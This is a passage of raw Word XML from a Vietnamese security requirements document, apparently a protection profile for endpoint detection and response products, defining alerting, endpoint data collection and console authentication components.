          </w:tcPr>
          <w:p w14:paraId="55F14949" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">FIA_AUT_EXT Cơ chế xác thực bảng điều khiển </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24954FCF" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="vi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">FIA_PWD_EXT Xác thực mật khẩu </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w14:paraId="60CB8EB0" w14:textId="77777777" w:rsidTr="000F0350">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61F14373" w14:textId="776B897E" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">Quản lý </w:t>
            </w:r>
            <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
              <w:t>an toàn</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> (FMT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6796" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FB5899C" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>FMT_SRF_EXT Thông số kỹ thuật của chức năng khắc phục</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="726D2905" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>FMT_TRM_EXT Chức năng khắc phục đáng tin cậy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08546B42" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2 Định nghĩa thành phần mở rộng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A36A2A" w14:textId="075BCF76" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">FAU_ALT_EXT Cảnh báo máy chủ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2CA705" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Các thành phần trong họ này xác định các yêu cầu đối với hoạt động hệ thống khiến TSF tạo ra cảnh báo về hoạt động và nội dung của các cảnh báo này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35105BE2" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cân bằng các thành phần</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA1CAB0" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>FAU_ALT_EXT.1, Cảnh báo máy chủ, mô tả các kích hoạt cảnh báo và thông tin có trong cảnh báo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6148538E" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Quản lý: FAU_ALT_EXT.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE996C3" w14:textId="23E347DB" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Các hành động sau đây có thể được xem xét cho các chức năng quản lý trong FMT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78495BA0" w14:textId="2FB3496A" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>- Cấu hình triệt tiêu trực quan các cảnh báo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314D1072" w14:textId="534E6E81" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kiểm toán: FAU_ALT_EXT.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747CC10C" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Không có sự kiện có thể kiểm toán dự kiến.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55661692" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FAU_ALT_EXT.1 Cảnh báo Máy chủ</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7106EF2E" w14:textId="0246137B" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Phân cấp tới: Không có thành phần nào khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F1B52B" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Phụ thuộc vào: Không phụ thuộc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC8048E" w14:textId="27EF549C" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FAU_ALT_EXT.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07637E47" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>EDR sẽ cảnh báo người dùng được ủy quyền trên bảng điều khiển quản lý trong trường hợp xảy ra bất kỳ trường hợp nào sau đây:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF0103C" w14:textId="662CE277" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>a. Thay đổi trạng thái đăng ký Tác nhân máy chủ,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAB883E" w14:textId="7366511A" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">b. Phát hiện </w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:t>hoạt động có khả năng trái phép</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> trên các điểm cuối đã đăng ký.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0020AC" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">FAU_ALT_EXT.1.2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11968014" w14:textId="17690ADC" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">EDR phải cung cấp </w:t>
      </w:r>
      <w:r w:rsidR="008D70AF" w:rsidRPr="00204C5F">
        <w:t>thông tin dạng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> trực quan về các cảnh báo đã phát hiện về các sự cố trái phép tiềm ẩn và phải bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BC32AA" w14:textId="3B62B7DF" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>a. Mức độ nghiêm trọng ban đầu của sự cố và [</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>đánh giá, phân loại, điểm số, xếp hạng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15907AA2" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>b. Một dòng thời gian sự cố.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF094D3" w14:textId="6DB360AB" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FAU_ALT_EXT.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8A402A" w14:textId="514BB041" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>EDR phải cung cấp khả năng xuất dữ liệu cho các cảnh báo đã chọn với định dạng dựa trên tiêu chuẩn cụ thể là [</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>chỉ định</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>định dạng cảnh báo</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC591C" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FAU_COL_EXT Dữ liệu điểm cuối đã thu thập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57835672" w14:textId="15EFA6DF" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Các thành phần trong họ này xác định các yêu cầu đối với dữ liệu được thu thập từ Tác nhân máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649833FF" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cân bằng các thành phần</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0F9CA5" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>FAU_COL_EXT.1, Dữ liệu điểm cuối được thu thập, xác định dữ liệu cụ thể được thu thập từ Tác nhân máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0351EA27" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Quản lý: FAU_COL_EXT.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F94C11" w14:textId="36E827F6" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Các hành động sau đây có thể được xem xét cho các chức năng quản lý trong FMT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E8181F" w14:textId="65CF5597" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>- Cấu hình khoảng thời gian để truyền dữ liệu đã thu thập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF21F20" w14:textId="082AB19A" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>- Cấu hình thông tin nhãn hoặc thẻ để liên kết dữ liệu đã thu thập với các hệ thống điểm cuối riêng lẻ hoặc nhóm hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A0DB80" w14:textId="6B88FBED" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kiểm toán: FAU_COL_EXT.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1411A547" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Không có sự kiện có thể kiểm toán dự kiến.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FE5E4D" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FAU_COL_EXT.1 Dữ liệu điểm cuối đã thu thập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50746AB7" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Phân cấp thành: Không có thành phần nào khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2ED7E8" w14:textId="4D8279F8" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00B02D60" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
        <w:t>hụ thuộc vào: Không phụ thuộc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B3BEC9" w14:textId="77777777" w:rsidR="00B02D60" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FAU_COL_EXT.1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291DA890" w14:textId="0191C809" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:lastRenderedPageBreak/>
        <w:t>EDR phải thu thập bộ dữ liệu điểm cuối tối thiểu sau đây từ Tác nhân máy chủ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D86883" w14:textId="03D5EB17" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00B02D60" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
        <w:t>. Phiên bản, kiến trúc và địa chỉ IP của Hệ điều hành (OS),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162E5F61" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>b. Hoạt động đăng nhập tài khoản điểm cuối đặc quyền và không đặc quyền,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0DD466" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>c. Tạo quy trình,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0999FD76" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>d. Thư viện và mô-đun được tải bởi các quy trình,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739D5861" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>đ. Tên tệp và [chỉ định: siêu dữ liệu khác] của các tệp được tạo và [chỉ định: các hoạt động khác được thực hiện đối với tệp] trên bộ lưu trữ liên tục,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76546A23" w14:textId="3C3E95C1" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>f. [</w:t>
      </w:r>
      <w:r w:rsidR="00B02D60" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>chỉ định</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Dữ liệu máy chủ khác</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F78A5F2" w14:textId="2CBC8A6D" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00B02D60" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">FIA_AUT_EXT </w:t>
      </w:r>
      <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cơ chế xác thực bảng điều khiển </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7282F7AC" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Các thành phần trong họ này xác định các yêu cầu đối với hành vi xác thực duy nhất đối với EDR TOE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25647B9F" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cân bằng các thành phần</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE7393D" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>FIA_AUT_EXT.1, Cơ chế xác thực bảng điều khiển, xác định các yếu tố xác thực duy nhất có thể được sử dụng để xác thực giao diện quản lý của EDR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338B8EA9" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Quản lý: FIA_AUT_EXT.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BECB766" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Không có chức năng quản lý cụ thể nào được xác định.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C43EDE9" w14:textId="77777777" w:rsidR="00B02D60" w:rsidRPr="00204C5F" w:rsidRDefault="00B02D60" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kiểm toán</w:t>
      </w:r>
      <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>: FIA_AUT_EXT.1</w:t>
      </w:r>
      <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13447AE8" w14:textId="12C0DF51" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Không có sự kiện nào có thể kiểm tra được dự kiến.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452BC842" w14:textId="3616B87F" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00B02D60" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FIA_AUT_EXT.1 Cơ chế xác thực bảng điều khiển</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAE6BBC" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Phân cấp thành: Không có thành phần nào khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D67EA62" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Phụ thuộc vào: Không phụ thuộc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06977856" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FIA_AUT_EXT.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF040B3" w14:textId="220E65BC" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>EDR phải [</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEEFB7A" w14:textId="5719E35E" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00B02D60" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
        <w:t>tận dụng nền tảng để xác thực,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D325940" w14:textId="02034A9B" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00B02D60" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
        <w:t>cung cấp xác thực dựa trên tên người dùng/mật khẩu và [lựa chọn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F96D59A" w14:textId="45B17E59" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00B02D60" w:rsidP="00BD2F41">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
        <w:t>xác thực bằng thẻ thông minh bên ngoài và mã PIN,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D3741" w14:textId="3EA6355D" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00B02D60" w:rsidP="00BD2F41">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
